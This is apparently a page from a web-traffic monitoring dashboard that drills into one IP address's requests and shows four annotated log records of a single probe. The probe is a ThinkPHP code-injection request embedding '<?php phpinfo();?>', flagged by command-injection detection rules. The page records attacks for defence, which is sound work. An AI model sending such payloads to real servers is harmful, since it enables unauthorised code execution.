← Back to IP report

Log Explorer

Fact drill-down for 45.251.136.225

Risk 3 LOW Scope All time All-time facts 4 In-scope 4 Filtered 4 Seen 2025-01-24 → 2025-01-24

Reset (all-time)

Active (none) Clear

Faceted filters (facts-based) exact core + snapshot + optional start/end

Annotation facets

HTTP facets

Snapshot facets

Custom time window (optional override)

Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.

Tip: keep windows tight when you need speed, but the default is fact-complete.

Top annotators (facts, in-scope)

cmdi 3 base 1

Top labels (facts, in-scope)

cmdi 3 observed 1

Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 1 — total 4 rows

← Prev Next →

#1 2025-01-24 11:32:37 event 2786457 GET 301 bytes 169

ann base label observed

Request event observed

/?s=admin/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/?s=admin/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

summary

event observed

details

—

subnet

45.251.136.0/24

asn

21859 — Zenlayer Inc

geo

Hong Kong, Sai Kung District, Tseung Kwan O

org

Qstacknet Communication

#2 2025-01-24 11:32:37 event 2786457 GET 301 bytes 169

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/?s=admin/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='GET /?s=admin/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

More (full fields + snapshot) expand

url

/?s=admin/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='GET /?s=admin/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

subnet

45.251.136.0/24

asn

21859 — Zenlayer Inc

geo

Hong Kong, Sai Kung District, Tseung Kwan O

org

Qstacknet Communication

#3 2025-01-24 11:32:37 event 2786457 GET 301 bytes 169

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/?s=admin/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='GET /?s=admin/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

More (full fields + snapshot) expand

url

/?s=admin/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='GET /?s=admin/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

subnet

45.251.136.0/24

asn

21859 — Zenlayer Inc

geo

Hong Kong, Sai Kung District, Tseung Kwan O

org

Qstacknet Communication

#4 2025-01-24 11:32:37 event 2786457 GET 301 bytes 169

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:param_plus_cmd

/?s=admin/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

Annotation facts

label

cmdi

rule

cmdi:param_plus_cmd

conf

90.00

details

Suspicious command parameter combined with a recognized command token. Snippet='GET /?s=admin/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

More (full fields + snapshot) expand

url

/?s=admin/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

summary

Command/file-injection indicator: cmdi:param_plus_cmd

details

Suspicious command parameter combined with a recognized command token. Snippet='GET /?s=admin/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

subnet

45.251.136.0/24

asn

21859 — Zenlayer Inc

geo

Hong Kong, Sai Kung District, Tseung Kwan O

org

Qstacknet Communication

Log Explorer

Annotated access events

Confirm Action